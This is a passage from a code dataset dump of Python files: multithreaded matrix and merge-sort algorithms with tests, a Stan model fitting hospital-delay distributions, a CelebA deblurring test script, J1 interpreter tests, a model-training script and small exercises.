A[i][j] * x[j][0]\n \n for i in range(row):\n t = threading.Thread(target = mul_row, args = [A, x, y, i])\n t.start()\n threads.append(t)\n \n for t in threads:\n t.join()\n \n return y\n\ndef matrix_multiply_matrix_multithreaded_1(A, B):\n row = A.row()\n col = B.col()\n C = matrix(row, col)\n \n threads = []\n \n def row_mul_col(A, B, C, i, j):\n for k in range(A.col()):\n C[i][j] += A[i][k] * B[k][j]\n \n def row_mul_matrix(A, B, C, i):\n for j in range(B.col()):\n t = threading.Thread(target = row_mul_col, args = [A, B, C, i, j])\n t.start()\n threads.append(t)\n \n for i in range(row):\n t = threading.Thread(target = row_mul_matrix, args = [A, B, C, i])\n t.start()\n threads.append(t) \n\n for t in threads:\n t.join()\n \n return C\n\ndef square_matrix_multiply_multithreaded_2(A, B):\n n = A.row()\n C = matrix(n, n)\n square_matrix_multiply_multithreaded_2_with_offset(n, C, 0, 0, A, 0, 0, B, 0, 0)\n return C\n\ndef square_matrix_multiply_multithreaded_2_with_offset(n, C, C_row_offset, C_col_offset, A, A_row_offset, A_col_offset, B, B_row_offset, B_col_offset):\n if n == 1:\n C[C_row_offset][C_col_offset] = A[A_row_offset][A_col_offset] * B[B_row_offset][B_col_offset]\n else:\n #Declare T11, T12, T21, T22 takes Θ(n^2). Need to find a better way to partition T,\n #Otherwise the span of this algorithm will be bounded by that\n T11 = matrix(n//2, n//2)\n T12 = matrix(n//2, n//2)\n T21 = matrix(n//2, n//2)\n T22 = matrix(n//2, n//2)\n\n t1 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, C, C_row_offset, C_col_offset, A, A_row_offset, A_col_offset, B, B_row_offset, B_col_offset])\n t1.start()\n t2 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, C, C_row_offset, C_col_offset + n//2, A, A_row_offset, A_col_offset, B, B_row_offset, B_col_offset + n//2])\n t2.start()\n t3 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, C, C_row_offset + n//2, C_col_offset, A, A_row_offset + n//2, A_col_offset, B, B_row_offset, B_col_offset])\n t3.start()\n t4 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, C, C_row_offset + n//2, C_col_offset + n//2, A, A_row_offset + n//2, A_col_offset, B, B_row_offset, B_col_offset + n//2])\n t4.start()\n t5 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, T11, 0, 0, A, A_row_offset, A_col_offset + n//2, B, B_row_offset + n//2, B_col_offset])\n t5.start()\n t6 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, T12, 0, 0, A, A_row_offset, A_col_offset + n//2, B, B_row_offset + n//2, B_col_offset + n//2])\n t6.start()\n t7 = threading.Thread(target = square_matrix_multiply_multithreaded_2_with_offset, args=[n//2, T21, 0, 0, A, A_row_offset + n//2, A_col_offset + n//2, B, B_row_offset + n//2, B_col_offset])\n t7.start()\n square_matrix_multiply_multithreaded_2_with_offset(n//2, T22, 0, 0, A, A_row_offset + n//2, A_col_offset + n//2, B, B_row_offset + n//2, B_col_offset + n//2)\n t1.join()\n t2.join()\n t3.join()\n t4.join()\n t5.join()\n t6.join()\n t7.join()\n \n threads = []\n def add_element(i, j):\n if i < n//2:\n if j < n//2:\n T = T11\n else:\n T = T12\n else:\n if j < n//2:\n T = T21\n else:\n T = T22 \n \n i2 = i\n j2 = j\n if i >= n//2:\n i2 -= n//2\n if j >= n//2:\n j2 -= n//2\n \n C[C_row_offset + i][C_col_offset + j] += T[i2][j2]\n \n def add_row(i):\n for j in range(n):\n t = threading.Thread(target = 
add_element, args=[i, j])\n t.start()\n threads.append(t)\n \n for i in range(n):\n t = threading.Thread(target = add_row, args=[i])\n t.start()\n threads.append(t)\n \n for t in threads:\n t.join()\n\ndef merge_sort_multithreaded(A): \n n = len(A)\n p = 0\n r = n - 1\n if n != 0:\n merge_sort_multithreaded_2(A, p, r, A, 0)\n\ndef merge_sort_multithreaded_2(A, p, r, sorted, sorted_start_index):\n n = r - p + 1\n if n == 1:\n sorted[sorted_start_index] = A[p]\n else:\n T = [0] * n\n q = (p + r) // 2\n q2 = q - p + 1\n t1 = threading.Thread(target = merge_sort_multithreaded_2, args=[A, p, q, T, 0])\n t1.start() \n merge_sort_multithreaded_2(A, q + 1, r, T, q2)\n t1.join()\n \n merge_multithreaded(T, 0, q2 - 1, q2, n - 1, sorted, sorted_start_index)\n\ndef merge_multithreaded(T, p1, r1, p2, r2, A, p3):\n n1 = r1 - p1 + 1\n n2 = r2 - p2 + 1\n if n1 < n2:\n p1, p2 = p2, p1\n r1, r2 = r2, r1\n n1, n2 = n2, n1\n if n1 == 0:\n return\n else:\n q1 = (p1 + r1) // 2\n q2 = modified_binary_search_for_merge(T[q1], T, p2, r2)\n q3 = p3 + q1 - p1 + q2 - p2\n A[q3] = T[q1]\n t1 = threading.Thread(target = merge_multithreaded, args=[T, p1, q1-1, p2, q2-1, A, p3])\n t1.start()\n merge_multithreaded(T, q1+1, r1, q2, r2, A, q3+1)\n t1.join()\n\ndef modified_binary_search_for_merge(x, T, p, r):\n if p > r:\n return p\n \n low = p\n high = r + 1\n while low < high:\n mid = (low + high) // 2\n if x <= T[mid]:\n high = mid\n else:\n low = mid + 1\n return high\n\nclass multithreaded_algorithm_test(unittest.TestCase):\n def create_random_matrix(self, col, row):\n A = matrix(col, row)\n for i in range(col):\n for j in range(row):\n A[i][j] = random.randint(-100, 100)\n return A\n \n def test_matrix_multiply_vec(self):\n for _ in range(30):\n random_seed(False)\n row = random.randint(1, 10)\n col = random.randint(1, 10)\n A = self.create_random_matrix(row, col)\n x = self.create_random_matrix(col, 1)\n B1 = A * x\n B2 = matrix_multiply_vec_multithreaded(A, x)\n self.assertTrue(B1 == B2)\n \n def test_matrix_multiply_matrix_1(self):\n for _ in range(30):\n random_seed(False)\n row = random.randint(1, 10)\n col = random.randint(1, 10)\n col2 = random.randint(1, 10)\n A = self.create_random_matrix(row, col)\n B = self.create_random_matrix(col, col2)\n C1 = A * B\n C2 = matrix_multiply_matrix_multithreaded_1(A, B)\n self.assertTrue(C1 == C2)\n \n def test_matrix_multiply_matrix_2(self):\n for _ in range(10):\n random_seed(False)\n n = 2 ** random.randint(0, 3)\n A = self.create_random_matrix(n, n)\n B = self.create_random_matrix(n, n)\n C1 = A * B\n C2 = square_matrix_multiply_multithreaded_2(A, B)\n self.assertTrue(C1 == C2)\n \n def test_merge_sort_multithreaded(self):\n for n in range(30):\n random_seed(False)\n A = []\n golden = []\n for i in range(n):\n value = random.randint(1, 100)\n golden.append(value) \n A.append(value)\n \n merge_sort_multithreaded(A)\n golden.sort()\n self.assertTrue(A == golden)\n \n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"CLRS_Algorithm_in_Python/CLRS_algorithm/multithreaded_algorithm.py","file_name":"multithreaded_algorithm.py","file_ext":"py","file_size_in_byte":8317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"568707874","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 23 09:34:24 2020\n\n@author: iwona\n\"\"\"\n\n\nimport pandas as pd\nimport pystan\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport time\nsns.set()\n\nDATA_PATH = 
'../../data/'\nOUT_PATH = '../fitting_outputs/'\n\nCHOSEN_COLUMN = 1\nSEED = 4321\nITER = 2000\nCHAINS = 4\nMAX_VAL = 133 \n\n##############################################################################\n# this code fits the\n# GLN (generalised log-normal) model\n# to each of the covariates\nt0 = time.time()\n##############################################################################\n# LOAD AND PREPARE THE DATA\ndrop_columns = ['Unnamed: 0', 'Start_date', 'End_date']\n\nd_ICUstay = pd.read_csv(DATA_PATH + 'ICU-stay.csv')\nd_ICUstay = d_ICUstay[d_ICUstay['ICU-stay'] <= MAX_VAL]\nd_onsetDeath = pd.read_csv(DATA_PATH + 'onset-to-death.csv')\nd_onsetDeath = d_onsetDeath[d_onsetDeath['onset-to-death'] <= MAX_VAL]\nd_onsetDiagnosis= pd.read_csv(DATA_PATH + 'onset-to-diagnosis.csv')\nd_onsetDiagnosis = d_onsetDiagnosis[d_onsetDiagnosis['onset-to-diagnosis'] <= MAX_VAL]\nd_onsetAdmiss = pd.read_csv(DATA_PATH + 'onset-to-hospital-admission.csv')\nd_onsetAdmiss = d_onsetAdmiss[d_onsetAdmiss['onset-to-hospital-admission'] <= MAX_VAL]\nd_onsetDischarge = pd.read_csv(DATA_PATH + 'onset-to-hospital-discharge.csv')\nd_onsetDischarge = d_onsetDischarge[d_onsetDischarge['onset-to-hospital-discharge'] <= MAX_VAL]\nd_onsetICU = pd.read_csv(DATA_PATH + 'onset-to-ICU-admission.csv')\nd_onsetICU = d_onsetICU[d_onsetICU['onset-to-ICU-admission'] <= MAX_VAL]\nd_adminDeath = pd.read_csv(DATA_PATH + 'hospital-admission-to-death.csv')\nd_adminDeath = d_adminDeath[d_adminDeath['Hospital-Admission-to-death'] <= MAX_VAL]\nd_onsetDiagnosis_pcr= pd.read_csv(DATA_PATH + 'onset-to-diagnosis-pcr.csv')\nd_onsetDiagnosis_pcr = d_onsetDiagnosis_pcr[d_onsetDiagnosis_pcr['onset-to-diagnosis-pcr'] <= MAX_VAL]\n\nall_dfs = [d_ICUstay, d_onsetDeath, d_onsetDiagnosis,\n d_onsetAdmiss, d_onsetDischarge, d_onsetICU, d_adminDeath, d_onsetDiagnosis_pcr]\n\n\nfor df in all_dfs:\n df.dropna(inplace=True)\n\n# add a state ID (int)\nstates = d_onsetDeath['State'].unique()\nassert(len(states) == 27)\nstates.sort()\nstate_map = dict(zip(states, list(range(1, len(states)+1))))\nstates_id = list(range(1, len(states)+1))\n\ncolumns = []\nfor df in all_dfs:\n df.dropna(inplace=True) # remove the rows with nan values\n try:\n df.drop(columns = drop_columns, inplace = True)\n except:\n print('')\n col = str(df.columns[1])\n columns.append(col)\n df['StateID'] = df['State'].map(state_map)\n\n############################################################################\ncolumns = [columns[CHOSEN_COLUMN]]\nall_dfs = [all_dfs[CHOSEN_COLUMN]]\n############################################################################\n# Fitting distribution to the whole country - national estimates\nprint('National fits starting...')\n\ncode_brazil_gln = \"\"\"\nfunctions{\n real custom_lpdf(real x, real mu, real sigma, real g)\n {\n real logK = log(g) - (g+1)/g*log(2)-log(sigma)-lgamma(1/g);\n real tmp = logK - log(x) - 0.5 * pow(fabs((log(x)-mu)/sigma),g);\n return tmp;\n }\n}\ndata {\n int N;\n real y[N];\n}\nparameters {\n real mu;\n real sigma;\n real g;\n}\nmodel {\n for (i in 1:N){\n y[i] ~ custom(mu, sigma, g);\n }\n mu ~ normal(2,0.5);\n sigma ~ normal(0.5,0.5);\n g ~ normal(1.5,0.5);\n}\n\n\"\"\"\n\n \nmodel_brazil = pystan.StanModel(model_code=code_brazil_gln)\n\n\ndef fit_brazil(values, list_of_params):\n \"\"\"\"Fit the distribution to the completely pooled Brazil data\n i.e. 
gives the nationwide estimates\"\"\"\n stdata = values\n stan_data = {'N': len(stdata), 'y': stdata}\n fit = model_brazil.sampling(data=stan_data, iter=ITER, seed=SEED, \n chains=CHAINS, n_jobs=-1)\n print(fit) \n df = fit.to_dataframe()\n df = df[list_of_params]\n return df\n\ndef get_national_posteriors(param_list):\n national_posteriors = {}\n for i in range(len(columns)):\n df = all_dfs[i]\n col = columns[i]\n print(col)\n vals = df[col].values\n # watch out here!!! we're shifting the data!!!!\n vals = vals + 0.5\n posterior = fit_brazil(vals, param_list)\n national_posteriors.update({col: posterior})\n return national_posteriors\n\nnational_posteriors_gln = get_national_posteriors(['mu', 'sigma', 'g'])\n\n############################################################################\n# Fitting distribution to the partially pooled data\ncode_pp_gln = \"\"\"\nfunctions{\n real custom_lpdf(real x, real mu, real sigma, real g)\n {\n real logK = log(g) - (g+1)/g*log(2)-log(sigma)-lgamma(1/g);\n real tmp = logK - log(x) - 0.5 * pow(fabs((log(x)-mu)/sigma),g);\n return tmp;\n }\n}\ndata {\n int K; // number of states\n int N; // total number of observations\n real X[N]; // observations\n int state[N]; // index with the state number for each observation\n}\nparameters {\n real mu[K];\n real sigma[K];\n real g[K];\n // hyperparameters\n real sigma_mu;\n real sigma_sigma;\n real sigma_g;\n}\n\nmodel {\n // likelihood\n for (i in 1:N){\n X[i] ~ custom(mu[state[i]], sigma[state[i]], g[state[i]]);\n }\n // priors\n mu ~ normal(INSERT_MU,sigma_mu);\n sigma ~ normal(INSERT_SIGMA,sigma_sigma);\n g ~ normal(INSERT_G,sigma_g);\n\n // hyperpriors\n sigma_mu ~ normal(2,0.5);\n sigma_sigma ~ normal(0.5,0.5);\n sigma_g ~ normal(1.5,0.5);\n\n}\n\"\"\"\n\nprint('Sub-national fits starting...')\n\ndef fit_partial_pooling(stan_code, df, col, mu, sigma, g):\n stan_code = stan_code.replace('INSERT_MU', str(mu))\n stan_code = stan_code.replace('INSERT_SIGMA', str(sigma))\n stan_code = stan_code.replace('INSERT_G', str(g))\n\n model = pystan.StanModel(model_code=stan_code)\n stan_pp_data = {'K': 27, 'N': df.shape[0], \n 'X': df[col].values + 0.5,\n 'state': df['StateID'].values}\n fit = model.sampling(data=stan_pp_data, iter=ITER, seed=SEED, chains=CHAINS, n_jobs=-1,\n control={'adapt_delta': 0.8})\n print(fit)\n posterior_df = fit.to_dataframe()\n params_columns = posterior_df.columns.str.startswith('mu')+posterior_df.columns.str.startswith('sigma')+posterior_df.columns.str.startswith('g')\n posterior_df = posterior_df.loc[:,params_columns]\n return posterior_df\n\n\nstate_posteriors_gln = {}\nfor i in range(len(columns)):\n df = all_dfs[i]\n col = columns[i]\n print(col)\n stan_code = code_pp_gln\n mu = national_posteriors_gln[col]['mu'].values.mean()\n sigma = national_posteriors_gln[col]['sigma'].values.mean()\n g = national_posteriors_gln[col]['g'].values.mean()\n posterior = fit_partial_pooling(stan_code, df, col, mu, sigma, g)\n # add national estimates\n posterior = pd.concat([posterior, national_posteriors_gln[col]], axis=1, sort=False)\n state_posteriors_gln.update({col: posterior})\n # save the output\n posterior.to_csv(OUT_PATH + col +'-samples-gln.csv', index=False)\ndel posterior, df\n \n\nprint('GLN model fits done')\nprint('Time elapsed: ', round((time.time()-t0)/60,1), ' minutes')\n","sub_path":"python_scripts_fitting/gln_1.py","file_name":"gln_1.py","file_ext":"py","file_size_in_byte":7304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} 
+{"seq_id":"629353822","text":"import torch\nimport os\nimport random\nimport sys\nsys.path.append('/home-nfs/gilton/learned_iterative_solvers')\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import transforms\n\nimport operators.blurs as blurs\nfrom operators.operator import OperatorPlusNoise\nfrom utils.celeba_dataloader import CelebaTrainingDatasetSubset, CelebaTestDataset\nfrom networks.u_net import UnetModel\nfrom solvers.neumann import PrecondNeumannNet\nfrom testing import standard_testing\n\n# Parameters to modify\nn_epochs = 80\ncurrent_epoch = 0\nbatch_size = 8\nn_channels = 3\nlearning_rate = 0.001\nprint_every_n_steps = 10\nsave_every_n_epochs = 5\ninitial_eta = 0.1\n\ninitial_data_points = 10000\n# point this towards your celeba files\ndata_location = \"/share/data/vision-greg2/mixpatch/img_align_celeba/\"\n\nkernel_size = 5\n\n# modify this for your machine\nsave_location = \"/share/data/vision-greg2/users/gilton/gaussianblur_nonoise_precondneumann.ckpt\"\n\ngpu_ids = []\nfor ii in range(6):\n try:\n torch.cuda.get_device_properties(ii)\n print(str(ii), flush=True)\n if not gpu_ids:\n gpu_ids = [ii]\n else:\n gpu_ids.append(ii)\n except AssertionError:\n print('Not ' + str(ii) + \"!\", flush=True)\n\nprint(os.getenv('CUDA_VISIBLE_DEVICES'), flush=True)\ngpu_ids = [int(x) for x in gpu_ids]\n# device management\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nuse_dataparallel = len(gpu_ids) > 1\nprint(\"GPU IDs: \" + str([int(x) for x in gpu_ids]), flush=True)\n\n# Set up data and dataloaders\ntransform = transforms.Compose(\n [\n transforms.Resize((128, 128)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ]\n)\n\ntest_dataset = CelebaTestDataset(data_location, transform=transform)\ntest_dataloader = torch.utils.data.DataLoader(\n dataset=test_dataset, batch_size=batch_size, shuffle=False, drop_last=True,\n)\n\n### Set up solver and problem setting\n\nforward_operator = blurs.GaussianBlur(sigma=5.0, kernel_size=kernel_size,\n n_channels=3, n_spatial_dimensions=2).to(device=device)\nmeasurement_process = forward_operator\n\ninternal_forward_operator = blurs.GaussianBlur(sigma=5.0, kernel_size=kernel_size,\n n_channels=3, n_spatial_dimensions=2).to(device=device)\n\n# standard u-net\nlearned_component = UnetModel(in_chans=n_channels, out_chans=n_channels, num_pool_layers=4,\n drop_prob=0.0, chans=32)\nsolver = PrecondNeumannNet(linear_operator=internal_forward_operator, nonlinear_operator=learned_component,\n lambda_initial_val=initial_eta, cg_iterations=6)\n\nif use_dataparallel:\n solver = nn.DataParallel(solver, device_ids=gpu_ids)\nsolver = solver.to(device=device)\n\nstart_epoch = 0\ncpu_only = not torch.cuda.is_available()\n\n\nif os.path.exists(save_location):\n if not cpu_only:\n saved_dict = torch.load(save_location)\n else:\n saved_dict = torch.load(save_location, map_location='cpu')\n solver.load_state_dict(saved_dict['solver_state_dict'])\nelse:\n print(\"JUST SO YOU KNOW, YOUR CHECKPOINT DOES NOT EXIST. 
CONTINUING WITH A RANDOMLY-INITIALIZED SOLVER.\")\n\n\n# set up loss and train\nlossfunction = torch.nn.MSELoss()\n\n# Do train\nstandard_testing.test_solver(solver=solver, test_dataloader=test_dataloader,\n measurement_process=measurement_process, device=device)","sub_path":"testing/celeba/gaussian_blur_nonoise_precondneumann.py","file_name":"gaussian_blur_nonoise_precondneumann.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"553103020","text":"#Lucas Faletra\n\nfrom J0__init__ import *\nfrom J1__init__ import *\n\n\n\ndef J1_test_basic(J, n, expected):\n print(\"J1_task9: test \", n)\n print(J.show())\n if str(J.show()) == expected:\n print(\"test \", n, \" passed\")\n else:\n print(\"test \", n, \" failed\")\n\n\n\n\ndef J1_test_interp(J, n, expected):\n print(\"J1_task11: test \", n)\n print(J.interp().show())\n if str(J.interp().show()) == expected:\n print(\"test \", n, \" passed\")\n else:\n print(\"test \", n, \" failed\")\n\n\n\n\n#some very quick tests for find_redex\ndef J1_tests():\n\n #test for simple context_if and redex\n #redex is used in the interp method and plug is used in the redex function\n \n\n a = JIf(JBool(\"true\"), desugar(SE_Num(4)), desugar(SE_Num(68)))\n print(\"expected value of a is: \" + a.interp().show())\n \n b = (Context_IF(a)).interp()\n print(\"actual output of find redex: \" + b.show())\n\n\n \n\n ##############################################################\n\n\n \n a = desugar(SE_Cons(SE_str(\"+\"), SE_Cons(SE_Num(1), SE_Num(2))))\n print(\"expected value of a is: \", a.interp().show())\n\n b = (Context_Cons(a)).interp()\n print(\"actual output value of find_redex function: \" + b.show())\n\n\n\n\n\n#assume the C file will have a JCons or JAtom type constructed and this variable\n#is called test(created by Convert_HL)\ndef CK0_test(e):\n if isinstance(e, JCons):\n \n return\n elif isinstance(e, JIf):\n return c_pair\n elif isinstance(e, JNull) or isinstance(e, JPrim) or isinstance(e, JNumber) or isinstance(e, JBool):\n #construct pair from atom and Kret\n return\n else:\n print(\"CK0 was not given an if, cons or atom type in HL code\")\n return\n\n\n\n#this is the test for calling LL constructors on all possible J1 data types\n#if anything is wrong, gcc will give errors in the terminal\n#a new c file is produced each time HL_convert is called\n#that is because of testing purposes it will be changed later\n\ndef HL_conversion():\n \n ########################################################\n #IMPORTANT\n #CK0 takes expression in the form + 2 2, < 2 4, etc\n #putting in something like 2 + 2 will cause a seg fault\n ########################################################\n\n\n #moved beginning and end of C file to this function\n\n C_File = open(\"main.c\", \"w+\")\n LL_string = \"\"\n\n LL_string = LL_string + \"#include \\n#include \\n#include \\n\"\n LL_string = LL_string + \"#include \\\"J1.h\\\"\\n\\n\"\n LL_string = LL_string + \"int main(){\\n\"\n\n C_File.write(LL_string)\n C_File.close()\n\n\n a = JBool(\"true\")\n \n b = JNull()\n #a2 = JCons(a, b)\n c = JPrim(\">=\")\n c2 = JPrim(\"<\")\n add = JPrim(\"+\")\n sub = JPrim(\"-\")\n mult = JPrim(\"*\")\n #c2 = JCons(c, b)\n d = JNumber(68)\n d2 = JNumber(99)\n d3 = JNumber(2)\n d4 = JNumber(5)\n e = JCons(d, d2)\n ee = JCons(c, e)\n i_f = JIf(a, d, d2)\n J_app = JApp(c, e)\n \n #2<\n t1 = JCons(add, JCons(d3, d4))\n\n\n #test of if(2 < 5, 2, else 5)\n #2<\n #t2 = JCons(t1, t3)\n \n #more 
complex if statement\n #t3 = JIf(t2, d3, d4)\n \n #Convert_HL(a)\n #print(\"\\ntest 1 passed\\n\")\n #Convert_HL(b)\n #print(\"\\ntest 2 passed\\n\")\n #Convert_HL(c)\n #print(\"\\ntest 3 passed\\n\")\n #Convert_HL(d)\n #print(\"\\ntest 4 passed\\n\")\n #Convert_HL(d2)\n #print(\"\\ntest 5 passed\\n\")\n #Convert_HL(e)\n #print(\"\\ntest 6 passed\\n\")\n #Convert_HL(ee)\n #print(\"\\ntest 7 passed\\n\")\n Convert_HL(t1)\n \n #if(true, then 68, else 69)\n #this case passed successfully\n #Convert_HL(i_f)\n \n #print(\"\\ntest 8 passed\\n\")\n\n\n C_File = open(\"main.c\", \"a+\")\n\n\n #write pair to file\n C_File.write(c_pair(t1))\n C_File.write(\"CK0(p);\\n\")\n\n LL_string = \"\"\n \n LL_string += \"\\n return 0; \\n}\\n\\n\"\n C_File.write(LL_string)\n C_File.close()\n\n #after file has been created, attempt to compile and run with gcc\n\n\n\n subprocess.call([\"gcc\", \"main.c\", \"J1.h\", \"J1.c\"])\n print(\"attempting to compile C code\")\n executable = subprocess.call(\"./a.out\")\n print(\"running executable\")\n print(\"resulting output of executable is:\")\n print (executable)\n\n #Convert_HL(J_app)\n #print(\"\\ntest 9 passed\\n\")\n #print(\"all tests passed\")\n#SEXPR_TESTS()\n#J1_tests()\n#HL_conversion()\n\n\n\ndef main():\n #these are basic test functions that just call the data structures' print functions\n J1_test_basic(JNumber(desugar(SE_Num(10)).n), 1, \"10\") \n J1_test_basic(JNumber(desugar(SE_Num(1000)).n), 2, \"1000\")\n J1_test_basic(JBool(SE_str(\"true\").s), 3, \"true\")\n J1_test_basic(JBool(SE_str(\"false\").s), 4, \"false\")\n J1_test_basic(JPrim(SE_str(\"==\").s), 5, \"==\")\n J1_test_basic(JPrim(SE_str(\"<\").s), 6, \"<\") \n J1_test_basic(JPrim(SE_str(\">\").s), 7, \">\")\n J1_test_basic(JNull(), 8, \"empty\")\n J1_test_basic(JCons(JNumber(desugar(SE_Num(10)).n), JNumber(desugar(SE_Num(100)).n)), 9, \"(10 100)\")\n J1_test_basic(JCons(JNumber(desugar(SE_Num(99)).n), JNumber(desugar(SE_Num(23)).n)), 10, \"(99 23)\")\n J1_test_basic(JIf(JBool(SE_str(\"true\").s), JNumber(desugar(SE_Num(1)).n), JNumber(desugar(SE_Num(3)).n)), 11, \"(if true 1 else: 3)\")\n J1_test_basic(JIf(JBool(SE_str(\"false\").s), JNumber(desugar(SE_Num(0)).n), JNumber(desugar(SE_Num(3)).n)), 12, \"(if false 0 else: 3)\")\n\n\n\n #these tests call the J1 interpreter\n \n J1_test_interp(JNumber(10), 13, \"10\") \n J1_test_interp(JNumber(1000), 14, \"1000\")\n J1_test_interp(JBool(\"true\"), 15, \"true\")\n J1_test_interp(JBool(\"false\"), 16, \"false\")\n J1_test_interp(JPrim(\"==\"), 17, \"==\")\n J1_test_interp(JPrim(\"<\"), 18, \"<\") \n J1_test_interp(JPrim(\">\"), 19, \">\")\n J1_test_interp(JNull(), 20, \"empty\")\n J1_test_interp(JCons(JNumber(10), JNumber(100)), 21, \"(10 100)\")\n J1_test_interp(JCons(JNumber(99), JNumber(23)), 22, \"(99 23)\")\n J1_test_interp(JIf(JBool(\"true\"), JNumber(1), JPrim(\">\")), 23, \"1\")\n J1_test_interp(JIf(JBool(\"false\"), JNumber(0), JNull()), 24, \"0\")\n\n\n \n\n\n\n\nmain()\n \n \n \n \n \n","sub_path":"HL/J1_tests.py","file_name":"J1_tests.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"449328160","text":"# import library\nimport os\nimport pandas as pd \nfrom sklearn import preprocessing\nfrom sklearn import ensemble\nfrom sklearn import metrics\nfrom . 
import dispatcher\nimport joblib\n\n#TRAINING_DATA = None\nTRAINING_DATA = os.environ.get(\"TRAINING_DATA\")\n#FOLD = None\n\"\"\"\nTypeError: only list-like objects are allowed to be passed to isin(), you passed a [NoneType]\nthat's why change to int\n\"\"\"\nFOLD = int(os.environ.get(\"FOLD\"))\nMODEL = os.environ.get(\"MODEL\")\n\nFOLD_MAPPING = {\n 0: [1, 2, 3, 4],\n 1: [0, 2, 3, 4],\n 2: [0, 1, 3, 4],\n 3: [0, 1, 2, 4],\n 4: [0, 1, 2, 3]\n}\n# main\nif __name__ == \"__main__\":\n df = pd.read_csv(TRAINING_DATA)\n train_df = df[df.kfolds.isin(FOLD_MAPPING.get(FOLD))]\n valid_df = df[df.kfolds==FOLD]\n # setting training and validation target \n ytrain = train_df.target.values\n yvalid = valid_df.target.values\n # drop columns \n train_df = train_df.drop([\"id\", \"target\", \"kfolds\"], axis=1)\n valid_df = valid_df.drop([\"id\", \"target\", \"kfolds\"], axis=1)\n # order of variable is same\n valid_df = valid_df[train_df.columns]\n\n #encode the variables\n label_encoders = []\n for c in train_df.columns:\n lbl = preprocessing.LabelEncoder()\n lbl.fit(train_df[c].values.tolist() + valid_df[c].values.tolist())\n train_df.loc[:, c] = lbl.transform(train_df[c].values.tolist())\n valid_df.loc[:, c] = lbl.transform(valid_df[c].values.tolist())\n label_encoders.append((c, lbl))\n \n # now train\n clf = dispatcher.MODELS[MODEL] # GETTING MODEL FROM `dispatcher` via environment variable:'MODEL'\n clf.fit(train_df, ytrain)\n preds = clf.predict_proba(valid_df)[:, 1] # probability : proba\n #print(preds)\n\n # calculate AUC \n print(metrics.roc_auc_score(yvalid, preds))\n\n #Save the models\n joblib.dump(label_encoders, f\"models/{MODEL}_{FOLD}_label_encoder.pkl\")\n joblib.dump(clf, f\"models/{MODEL}_{FOLD}.pkl\")\n\n\"\"\"\nNote:\nCompute Area Under the Receiver Operating Characteristic Curve (ROC AUC) from prediction scores.\nthis implementation can be used with binary, multiclass and multilabel classification, \nbut some restrictions apply (see Parameters).\n \n sklearn.metrics.roc_auc_score(y_true, y_score, average='macro', sample_weight=None, max_fpr=None, multi_class='raise', labels=None)[source]¶\n\n\"\"\"\n\"\"\"\n joblib.dump(label_encoders, f\"models/{MODEL}_label_encoder.pkl\")\n joblib.dump(clf, f\"models/{MODEL}.pkl\")\n\"\"\"","sub_path":"competitions-1/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"289732329","text":"# 8. 
Write a Python function that takes a list and returns a new list with unique elements of the first list\n\n\ndef get_unique_item(my_list):\n unique_list = []\n print(\"The list is : %s\" % my_list)\n for item in my_list:\n if item not in unique_list:\n unique_list.append(item)\n return unique_list\n\n\nprint(\"The unique list is : %s\" % get_unique_item([2, 22, 4, 43, 3, 3, 2, 6]))\n\n# can be done using the set() function\n\n# def get_unique_item1(my_list):\n# unique_list = list(set(my_list))\n# return unique_list\n#\n# print(\"The list is : [2,22,4,43,3,3,2,6]\" )\n# print(get_unique_item1([2,22,4,43,3,3,2,6]))\n","sub_path":"Function-problems/function8.py","file_name":"function8.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"428572269","text":"import numpy\nfrom noise import snoise2\n\n\nclass WindSimulation(object):\n @staticmethod\n def is_applicable(world):\n return not world.has_wind()\n\n def execute(self, world, seed, freq, octave):\n assert seed is not None\n self.frequency = freq\n self.octaves = octave\n direction = self._calculate(self, world, 0.5, seed)\n world.set_wind_direction(direction)\n\n @staticmethod\n def _calculate(self, world, distorsion_factor, seed):\n NORTH = 0.0\n EAST = 0.25\n SOUTH = 0.5\n WEST = 0.75\n\n def _set_line_to_gradient(data, y, start_y, end_y, start_value, end_value):\n delta = float(end_y - start_y)\n start_affinity = float(end_y - y) / delta\n end_affinity = 1.0 - start_affinity\n value = start_value * start_affinity + end_value * end_affinity\n data[y] = value\n\n def _wrap(value):\n while value < 0.0:\n value += 1.0\n while value > 1.0:\n value -= 1.0\n return value\n\n # This is based on the algorithm described here: http://www.dungeonleague.com/2010/03/28/wind-direction/\n # We initially have a direction which depends only on the latitude:\n #\n # North Pole = South\n # North Circle = North\n # North Tropic = East\n # Equator = West\n # South Tropic = East\n # South Circle = South\n # South Pole = North\n #\n # Then we add noise to that\n\n NORTH_POLE = int(world.height * 0.0)\n NORTH_CIRCLE = int(world.height * 0.16)\n NORTH_TROPIC = int(world.height * 0.34)\n EQUATOR = int(world.height * 0.5)\n SOUTH_TROPIC = int(world.height * 0.66)\n SOUTH_CIRCLE = int(world.height * 0.84)\n SOUTH_POLE = int(world.height * 1.0)\n\n data = numpy.zeros((world.height, world.width), dtype=float)\n for y in range(NORTH_POLE, 